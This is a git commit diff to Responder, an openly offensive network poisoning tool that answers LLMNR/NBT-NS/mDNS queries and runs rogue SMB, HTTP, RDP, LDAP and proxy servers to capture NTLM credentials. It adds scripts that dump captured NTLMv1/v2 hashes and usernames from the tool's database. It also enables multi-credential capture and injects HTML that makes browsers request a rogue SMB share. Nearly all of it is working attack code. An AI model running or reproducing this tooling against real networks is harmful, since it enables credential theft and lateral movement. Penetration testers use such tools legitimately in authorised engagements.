forgot to add packets.py

fix custom challenge in python3

.gitignore

@@ -2,4 +2,4 @@
 *.db
 *.txt
 *.log
-logs/*
+

DumpHash.py

@@ -0,0 +1,49 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import sqlite3
+
+def DumpHashToFile(outfile, data):
+	with open(outfile,"w") as dump:
+		dump.write(data)
+
+def DbConnect():
+    cursor = sqlite3.connect("./Responder.db")
+    return cursor
+
+def GetResponderCompleteNTLMv2Hash(cursor):
+     res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v2%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)")
+     Output = ""
+     for row in res.fetchall():
+         Output += '{0}'.format(row[0])+'\n'
+     return Output
+
+def GetResponderCompleteNTLMv1Hash(cursor):
+     res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v1%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)")
+     Output = ""
+     for row in res.fetchall():
+         Output += '{0}'.format(row[0])+'\n'
+     return Output
+
+cursor = DbConnect()
+print("Dumping NTLMV2 hashes:")
+v2 = GetResponderCompleteNTLMv2Hash(cursor)
+DumpHashToFile("DumpNTLMv2.txt", v2)
+print(v2)
+print("\nDumping NTLMv1 hashes:")
+v1 = GetResponderCompleteNTLMv1Hash(cursor)
+DumpHashToFile("DumpNTLMv1.txt", v1)
+print(v1)

OSX_launcher.sh

@@ -0,0 +1,39 @@
+# responder launcher
+# set -x
+# Usage:
+# ./responderd /path/to/responder interface responder_options
+
+# port list
+# Everything -> tcp:21 tcp:80 tcp:25 udp:53 tcp:88 udp:137 udp:138 tcp:139 tcp:143 tcp:443 tcp:445 tcp:110 tcp:389 tcp:1433 tcp:3141 udp:5353 udp:5355
+PORT_LIST=(tcp:21 udp:53 tcp:88 udp:137 udp:138 tcp:139 tcp:143 tcp:445 tcp:389 tcp:1433 udp:5353 udp:5355)
+SVC_LIST=()
+
+# check for running processes and kill them one by one
+# looping over everything rather than doing a mass kill because some processes may be 
+# children and may not need to be killed
+for port in ${PORT_LIST[@]}; do
+	PROC=$(lsof +c 0 -i $port | grep -m 1 -v 'launchd\|COMMAND' | cut -d' ' -f1)
+	if [ -n "$PROC" ]; then
+        AGENT=$(sudo launchctl list | grep -m 1 $PROC | cut -f3 | sed 's/.reloaded//g')
+
+        # load/unload are listed as "legacy" in 10.10+ may need to change this someday
+		echo "Stopping $PROC"
+        sudo launchctl unload -w /System/Library/LaunchDaemons/$AGENT.plist
+
+        # append killed service to new array
+        SVC_LIST+=($AGENT)
+	fi
+done
+
+# get IP address
+IP=$(ifconfig $2 | grep 'inet ' | cut -d' ' -f2)
+
+# Launch responder
+python $1 $3 -i $IP
+
+# restore stopped services
+for agent in ${SVC_LIST[@]}; do
+	echo "Starting $agent"
+		sudo launchctl load -w /System/Library/LaunchDaemons/$agent.plist
+
+done

README.md

@@ -1,6 +1,6 @@
-# Responder.py #
+# Responder/MultiRelay #
 
-LLMNR/NBT-NS/mDNS Poisoner
+LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay.
 
 Author: Laurent Gaffie <laurent.gaffie@gmail.com >  https://g-laurent.blogspot.com
 
@@ -8,7 +8,7 @@ Author: Laurent Gaffie <laurent.gaffie@gmail.com >  https://g-laurent.blogspot.c
 
 ## Intro ##
 
-Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answer to File Server Service request, which is for SMB.
+Responder is an LLMNR, NBT-NS and MDNS poisoner. It will answer to *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answer to File Server Service request, which is for SMB.
 
 The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option via command line if you want to answer to the Workstation Service request name suffix.
 
@@ -74,13 +74,13 @@ This module allows you to see NBT-NS, BROWSER, LLMNR, DNS requests on the networ
 
 ## Hashes ##
 
-All hashes are printed to stdout and dumped in an unique file John Jumbo compliant, using this format:
+All hashes are printed to stdout and dumped in a unique John Jumbo compliant file, using this format:
 
     (MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt
 
 Log files are located in the "logs/" folder. Hashes will be logged and printed only once per user per hash type, unless you are using the Verbose mode (-v).
 
-- Responder will logs all its activity to Responder-Session.log
+- Responder will log all its activity to Responder-Session.log
 - Analyze mode will be logged to Analyze-Session.log
 - Poisoning will be logged to Poisoners-Session.log
 
@@ -89,7 +89,7 @@ Additionally, all captured hashed are logged into an SQLite database which you c
 
 ## Considerations ##
 
-- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587 and Multicast UDP 5553.
+- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, UDP 1434, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128, Multicast UDP 5355 and 5353.
 
 - If you run Samba on your system, stop smbd and nmbd and all other services listening on these ports.
 
@@ -121,7 +121,7 @@ Running the tool:
 
 Typical Usage Example:
 
-    ./Responder.py -I eth0 -rFv
+    ./Responder.py -I eth0 -rPv
 
 Options:
 
@@ -131,6 +131,11 @@ Options:
 	                        BROWSER, LLMNR requests without responding.
 	  -I eth0, --interface=eth0
 	                        Network interface to use.
+          -i 10.0.0.21, --ip=10.0.0.21
+                                Local IP to use (only for OSX)
+          -e 10.0.0.22, --externalip=10.0.0.22
+                                Poison all requests with another IP address than
+                                Responder's one.
 	  -b, --basic           Return a Basic HTTP authentication. Default: NTLM
 	  -r, --wredir          Enable answers for netbios wredir suffix queries.
 	                        Answering to wredir will likely break stuff on the
@@ -148,20 +153,53 @@ Options:
 	  -F, --ForceWpadAuth   Force NTLM/Basic authentication on wpad.dat file
 	                        retrieval. This may cause a login prompt. Default:
 	                        Off
+	  -P, --ProxyAuth       Force NTLM (transparently)/Basic (prompt) 
+                                authentication for the proxy. WPAD doesn't need to
+                                be ON. This option is highly effective when combined
+                                with -r. Default: Off
 	  --lm                  Force LM hashing downgrade for Windows XP/2003 and
-	                        earlier. Default: False
+	                        earlier. Default: Off
 	  -v, --verbose         Increase verbosity.
 	
 
+## Donation ##
 
+You can contribute to this project by donating to the following $XLM (Stellar Lumens) address:
 
+"GCGBMO772FRLU6V4NDUKIEXEFNVSP774H2TVYQ3WWHK4TEKYUUTLUKUH"
+
+Or BTC address:
+
+"1HkFmFs5fmbCoJ7ZM5HHbGgjyqemfU9o7Q"
+
+## Acknowledgments ##
+
+Late Responder development has been possible because of the donations received from individuals and companies.
+
+We would like to thanks those major donator:
+
+- SecureWorks : https://www.secureworks.com/
+
+- Black Hills Information Security: http://www.blackhillsinfosec.com/
+
+- TrustedSec: https://www.trustedsec.com/
+
+- Red Siege Information Security: https://www.redsiege.com/
+
+- Open-Sec: http://www.open-sec.com/
+
+- And all, ALL the pentesters around the world who donated to this project.
+
+Thank you.
 
 ## Copyright ##
 
 NBT-NS/LLMNR Responder
 
 Responder, a network take-over set of tools created and maintained by Laurent Gaffie.
+
 email: laurent.gaffie@gmail.com
+
 This program is free software: you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
 the Free Software Foundation, either version 3 of the License, or

Report.py

@@ -0,0 +1,95 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import sqlite3
+import os
+
+def color(txt, code = 1, modifier = 0):
+	if txt.startswith('[*]'):
+		settings.Config.PoisonersLogger.warning(txt)
+	elif 'Analyze' in txt:
+		settings.Config.AnalyzeLogger.warning(txt)
+
+	if os.name == 'nt':  # No colors for windows...
+		return txt
+	return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
+
+def DbConnect():
+    cursor = sqlite3.connect("./Responder.db")
+    return cursor
+
+def GetResponderData(cursor):
+     res = cursor.execute("SELECT * FROM Responder")
+     for row in res.fetchall():
+         print('{0} : {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}'.format(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8]))
+
+def GetResponderUsernamesStatistic(cursor):
+     res = cursor.execute("SELECT COUNT(DISTINCT UPPER(user)) FROM Responder")
+     for row in res.fetchall():
+         print(color('[+] In total {0} unique user accounts were captured.'.format(row[0]), code = 2, modifier = 1))
+
+def GetResponderUsernames(cursor):
+     res = cursor.execute("SELECT DISTINCT user FROM Responder")
+     for row in res.fetchall():
+         print('User account: {0}'.format(row[0]))
+
+def GetResponderUsernamesWithDetails(cursor):
+     res = cursor.execute("SELECT client, user, module, type, cleartext FROM Responder WHERE UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder) ORDER BY client")
+     for row in res.fetchall():
+         print('IP: {0} module: {1}:{3}\nuser account: {2}'.format(row[0], row[2], row[1], row[3]))
+
+
+def GetResponderCompleteHash(cursor):
+     res = cursor.execute("SELECT fullhash FROM Responder WHERE UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)")
+     for row in res.fetchall():
+         print('{0}'.format(row[0]))
+
+def GetUniqueLookups(cursor):
+     res = cursor.execute("SELECT * FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned) ORDER BY SentToIp, Poisoner")
+     for row in res.fetchall():
+         print('IP: {0}, Protocol: {1}, Looking for name: {2}'.format(row[2], row[1], row[3]))
+
+
+def GetStatisticUniqueLookups(cursor):
+     res = cursor.execute("SELECT COUNT(*) FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned)")
+     for row in res.fetchall():
+         print(color('[+] In total {0} unique queries were poisoned.'.format(row[0]), code = 2, modifier = 1))
+
+
+def SavePoisonersToDb(result):
+
+	for k in [ 'Poisoner', 'SentToIp', 'ForName', 'AnalyzeMode']:
+		if not k in result:
+			result[k] = ''
+
+def SaveToDb(result):
+
+	for k in [ 'module', 'type', 'client', 'hostname', 'user', 'cleartext', 'hash', 'fullhash' ]:
+		if not k in result:
+			result[k] = ''
+
+cursor = DbConnect()
+print(color("[+] Generating report...", code = 3, modifier = 1))
+print(color("[+] Unique lookups ordered by IP:", code = 2, modifier = 1))
+GetUniqueLookups(cursor)
+GetStatisticUniqueLookups(cursor)
+print(color("\n[+] Extracting captured usernames:", code = 2, modifier = 1))
+GetResponderUsernames(cursor)
+print(color("\n[+] Username details:", code = 2, modifier = 1))
+GetResponderUsernamesWithDetails(cursor)
+GetResponderUsernamesStatistic(cursor)
+#print color("\n[+] Captured hashes:", code = 2, modifier = 1)
+#GetResponderCompleteHash(cursor)

Responder.conf

@@ -3,6 +3,7 @@
 ; Servers to start
 SQL = On
 SMB = On
+RDP = On
 Kerberos = On
 FTP = On
 POP = On
@@ -12,9 +13,11 @@ HTTP = On
 HTTPS = On
 DNS = On
 LDAP = On
+DCERPC = On
 
-; Custom challenge
-Challenge = 1122334455667788
+; Custom challenge. 
+; Use "Random" for generating a random challenge for each requests (Default)
+Challenge = Random
 
 ; SQLite Database file
 ; Delete this file to re-capture previously captured hashes
@@ -38,24 +41,29 @@ RespondTo =
 
 ; Specific NBT-NS/LLMNR names to respond to (default = All)
 ; Example: RespondTo = WPAD, DEV, PROD, SQLINT
+;RespondToName = WPAD, DEV, PROD, SQLINT
 RespondToName = 
-
 ; Specific IP Addresses not to respond to (default = None)
 ; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10
 DontRespondTo = 
 
 ; Specific NBT-NS/LLMNR names not to respond to (default = None)
 ; Example: DontRespondTo = NAC, IPS, IDS
-DontRespondToName =
+DontRespondToName = ISATAP
 
 ; If set to On, we will stop answering further requests from a host
-; if a hash hash been previously captured for this host.
+; if a hash has been previously captured for this host.
 AutoIgnoreAfterSuccess = Off
 
 ; If set to On, we will send ACCOUNT_DISABLED when the client tries
 ; to authenticate for the first time to try to get different credentials.
 ; This may break file serving and is useful only for hash capture
-CaptureMultipleCredentials = Off
+CaptureMultipleCredentials = On
+
+; If set to On, we will write to file all hashes captured from the same host. 
+; In this case, Responder will log from 172.16.0.12 all user hashes: domain\toto, 
+; domain\popo, domain\zozo. Recommended value: On, capture everything.
+CaptureMultipleHashFromSameHost = On
 
 [HTTP Server]
 
@@ -73,18 +81,18 @@ Serve-Html = Off
 HtmlFilename = files/AccessDenied.html
 
 ; Custom EXE File to serve
-ExeFilename = files/BindShell.exe
+ExeFilename = ;files/filetoserve.exe
 
 ; Name of the downloaded .exe that the client will see
 ExeDownloadName = ProxyClient.exe
 
 ; Custom WPAD Script
-WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
+WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(*.ProxySrv|ProxySrv)")) return "DIRECT"; return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141; DIRECT';}
 
 ; HTML answer to inject in HTTP responses (before </body> tag).
 ; Set to an empty string to disable.
 ; In this example, we redirect make users' browsers issue a request to our rogue SMB server.
-HTMLToInject = <img src='file://RespProxySrv/pictures/logo.jpg' alt='Loading' height='1' width='1'>
+HTMLToInject = <img src='file://///RespProxySrv/pictures/logso.jpg' alt='Loading' height='1' width='1'>
 
 [HTTPS Server]
 

Responder.py

@@ -16,17 +16,22 @@
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import optparse
 import ssl
-
-from SocketServer import TCPServer, UDPServer, ThreadingMixIn
+try:
+	from SocketServer import TCPServer, UDPServer, ThreadingMixIn
+except:
+	from socketserver import TCPServer, UDPServer, ThreadingMixIn
 from threading import Thread
 from utils import *
-
+import struct
 banner()
 
 parser = optparse.OptionParser(usage='python %prog -I eth0 -w -r -f\nor:\npython %prog -I eth0 -wrf', version=settings.__version__, prog=sys.argv[0])
 parser.add_option('-A','--analyze',        action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests without responding.", dest="Analyze", default=False)
-parser.add_option('-I','--interface',      action="store",      help="Network interface to use", dest="Interface", metavar="eth0", default=None)
-parser.add_option('-i','--ip',      action="store",      help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None)
+parser.add_option('-I','--interface',      action="store",      help="Network interface to use, you can use 'ALL' as a wildcard for all interfaces", dest="Interface", metavar="eth0", default=None)
+parser.add_option('-i','--ip',             action="store",      help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None)
+
+parser.add_option('-e', "--externalip",    action="store",      help="Poison all requests with another IP address than Responder's one.", dest="ExternalIP",  metavar="10.0.0.22", default=None)
+
 parser.add_option('-b', '--basic',         action="store_true", help="Return a Basic HTTP authentication. Default: NTLM", dest="Basic", default=False)
 parser.add_option('-r', '--wredir',        action="store_true", help="Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network. Default: False", dest="Wredirect", default=False)
 parser.add_option('-d', '--NBTNSdomain',   action="store_true", help="Enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network. Default: False", dest="NBTNSDomain", default=False)
@@ -34,15 +39,18 @@ parser.add_option('-f','--fingerprint',    action="store_true", help="This optio
 parser.add_option('-w','--wpad',           action="store_true", help="Start the WPAD rogue proxy server. Default value is False", dest="WPAD_On_Off", default=False)
 parser.add_option('-u','--upstream-proxy', action="store",      help="Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)", dest="Upstream_Proxy", default=None)
 parser.add_option('-F','--ForceWpadAuth',  action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval. This may cause a login prompt. Default: False", dest="Force_WPAD_Auth", default=False)
+
+parser.add_option('-P','--ProxyAuth',       action="store_true", help="Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective when combined with -r. Default: False", dest="ProxyAuth_On_Off", default=False)
+
 parser.add_option('--lm',                  action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
 parser.add_option('-v','--verbose',        action="store_true", help="Increase verbosity.", dest="Verbose")
 options, args = parser.parse_args()
 
 if not os.geteuid() == 0:
-    print color("[!] Responder must be run as root.")
+    print(color("[!] Responder must be run as root."))
     sys.exit(-1)
 elif options.OURIP is None and IsOsX() is True:
-    print "\n\033[1m\033[31mOSX detected, -i mandatory option is missing\033[0m\n"
+    print("\n\033[1m\033[31mOSX detected, -i mandatory option is missing\033[0m\n")
     parser.print_help()
     exit(-1)
 
@@ -54,14 +62,24 @@ StartupMessage()
 settings.Config.ExpandIPRanges()
 
 if settings.Config.AnalyzeMode:
-	print color('[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1)
+	print(color('[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1))
+
+#Create the DB, before we start Responder.
+CreateResponderDb()
 
 class ThreadingUDPServer(ThreadingMixIn, UDPServer):
 	def server_bind(self):
 		if OsInterfaceIsSupported():
 			try:
-				self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
+				if settings.Config.Bind_To_ALL:
+					pass
+				else:
+					if (sys.version_info > (3, 0)):
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
+					else:
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
 			except:
+				raise
 				pass
 		UDPServer.server_bind(self)
 
@@ -69,11 +87,35 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer):
 	def server_bind(self):
 		if OsInterfaceIsSupported():
 			try:
-				self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
+				if settings.Config.Bind_To_ALL:
+					pass
+				else:
+					if (sys.version_info > (3, 0)):
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
+					else:
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
 			except:
+				raise
 				pass
 		TCPServer.server_bind(self)
 
+class ThreadingTCPServerAuth(ThreadingMixIn, TCPServer):
+	def server_bind(self):
+		if OsInterfaceIsSupported():
+			try:
+				if settings.Config.Bind_To_ALL:
+					pass
+				else:
+					if (sys.version_info > (3, 0)):
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
+					else:
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
+			except:
+				raise
+				pass
+		self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
+		TCPServer.server_bind(self)
+
 class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
 	def server_bind(self):
 		MADDR = "224.0.0.251"
@@ -85,15 +127,21 @@ class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
 
 		if OsInterfaceIsSupported():
 			try:
-				self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
+				if settings.Config.Bind_To_ALL:
+					pass
+				else:
+					if (sys.version_info > (3, 0)):
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
+					else:
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
 			except:
+				raise
 				pass
 		UDPServer.server_bind(self)
 
 class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
 	def server_bind(self):
 		MADDR = "224.0.0.252"
-
 		self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
 		self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
 		
@@ -101,22 +149,30 @@ class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
 		
 		if OsInterfaceIsSupported():
 			try:
-				self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
+				if settings.Config.Bind_To_ALL:
+					pass
+				else:
+					if (sys.version_info > (3, 0)):
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
+					else:
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
 			except:
-				pass
+				raise
+				#pass
 		UDPServer.server_bind(self)
 
 ThreadingUDPServer.allow_reuse_address = 1
 ThreadingTCPServer.allow_reuse_address = 1
 ThreadingUDPMDNSServer.allow_reuse_address = 1
 ThreadingUDPLLMNRServer.allow_reuse_address = 1
+ThreadingTCPServerAuth.allow_reuse_address = 1
 
 def serve_thread_udp_broadcast(host, port, handler):
 	try:
-		server = ThreadingUDPServer(('', port), handler)
+		server = ThreadingUDPServer((host, port), handler)
 		server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
+		print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")
 
 def serve_NBTNS_poisoner(host, port, handler):
 	serve_thread_udp_broadcast(host, port, handler)
@@ -126,36 +182,48 @@ def serve_MDNS_poisoner(host, port, handler):
 		server = ThreadingUDPMDNSServer((host, port), handler)
 		server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
+		print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")
 
 def serve_LLMNR_poisoner(host, port, handler):
 	try:
 		server = ThreadingUDPLLMNRServer((host, port), handler)
 		server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
+		raise
+		print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")
 
 def serve_thread_udp(host, port, handler):
 	try:
 		if OsInterfaceIsSupported():
-			server = ThreadingUDPServer((settings.Config.Bind_To, port), handler)
+			server = ThreadingUDPServer((host, port), handler)
 			server.serve_forever()
 		else:
 			server = ThreadingUDPServer((host, port), handler)
 			server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
+		print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")
 
 def serve_thread_tcp(host, port, handler):
 	try:
 		if OsInterfaceIsSupported():
-			server = ThreadingTCPServer((settings.Config.Bind_To, port), handler)
+			server = ThreadingTCPServer((host, port), handler)
 			server.serve_forever()
 		else:
 			server = ThreadingTCPServer((host, port), handler)
 			server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
+		print(color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running.")
+
+def serve_thread_tcp_auth(host, port, handler):
+	try:
+		if OsInterfaceIsSupported():
+			server = ThreadingTCPServerAuth((host, port), handler)
+			server.serve_forever()
+		else:
+			server = ThreadingTCPServerAuth((host, port), handler)
+			server.serve_forever()
+	except:
+		print(color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running.")
 
 def serve_thread_SSL(host, port, handler):
 	try:
@@ -164,7 +232,7 @@ def serve_thread_SSL(host, port, handler):
 		key =  os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
 
 		if OsInterfaceIsSupported():
-			server = ThreadingTCPServer((settings.Config.Bind_To, port), handler)
+			server = ThreadingTCPServer((host, port), handler)
 			server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True)
 			server.serve_forever()
 		else:
@@ -172,7 +240,7 @@ def serve_thread_SSL(host, port, handler):
 			server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True)
 			server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting SSL server on port " + str(port) + ", check permissions or other servers running."
+		print(color("[!] ", 1, 1) + "Error starting SSL server on port " + str(port) + ", check permissions or other servers running.")
 
 def main():
 	try:
@@ -192,66 +260,81 @@ def main():
 
 		if settings.Config.HTTP_On_Off:
 			from servers.HTTP import HTTP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 80, HTTP,)))
 
 		if settings.Config.SSL_On_Off:
-			from servers.HTTP import HTTPS
-			threads.append(Thread(target=serve_thread_SSL, args=('', 443, HTTPS,)))
+			from servers.HTTP import HTTP
+			threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 443, HTTP,)))
+
+		if settings.Config.RDP_On_Off:
+			from servers.RDP import RDP
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 3389, RDP,)))
+
+		if settings.Config.DCERPC_On_Off:
+			from servers.RPC import RPCMap, RPCMapper
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 135, RPCMap,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, settings.Config.RPCPort, RPCMapper,)))
 
 		if settings.Config.WPAD_On_Off:
 			from servers.HTTP_Proxy import HTTP_Proxy
-			threads.append(Thread(target=serve_thread_tcp, args=('', 3141, HTTP_Proxy,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 3141, HTTP_Proxy,)))
+
+		if settings.Config.ProxyAuth_On_Off:
+		        from servers.Proxy_Auth import Proxy_Auth
+		        threads.append(Thread(target=serve_thread_tcp_auth, args=(settings.Config.Bind_To, 3128, Proxy_Auth,)))
 
 		if settings.Config.SMB_On_Off:
 			if settings.Config.LM_On_Off:
 				from servers.SMB import SMB1LM
-				threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMB1LM,)))
-				threads.append(Thread(target=serve_thread_tcp, args=('', 139, SMB1LM,)))
+				threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 445, SMB1LM,)))
+				threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 139, SMB1LM,)))
 			else:
 				from servers.SMB import SMB1
-				threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMB1,)))
-				threads.append(Thread(target=serve_thread_tcp, args=('', 139, SMB1,)))
+				threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 445, SMB1,)))
+				threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 139, SMB1,)))
 
 		if settings.Config.Krb_On_Off:
 			from servers.Kerberos import KerbTCP, KerbUDP
 			threads.append(Thread(target=serve_thread_udp, args=('', 88, KerbUDP,)))
-			threads.append(Thread(target=serve_thread_tcp, args=('', 88, KerbTCP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 88, KerbTCP,)))
 
 		if settings.Config.SQL_On_Off:
-			from servers.MSSQL import MSSQL
-			threads.append(Thread(target=serve_thread_tcp, args=('', 1433, MSSQL,)))
+			from servers.MSSQL import MSSQL, MSSQLBrowser
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 1433, MSSQL,)))
+			threads.append(Thread(target=serve_thread_udp_broadcast, args=(settings.Config.Bind_To, 1434, MSSQLBrowser,)))
 
 		if settings.Config.FTP_On_Off:
 			from servers.FTP import FTP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 21, FTP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 21, FTP,)))
 
 		if settings.Config.POP_On_Off:
 			from servers.POP3 import POP3
-			threads.append(Thread(target=serve_thread_tcp, args=('', 110, POP3,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 110, POP3,)))
 
 		if settings.Config.LDAP_On_Off:
-			from servers.LDAP import LDAP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 389, LDAP,)))
+			from servers.LDAP import LDAP, CLDAP
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 389, LDAP,)))
+			threads.append(Thread(target=serve_thread_udp, args=('', 389, CLDAP,)))
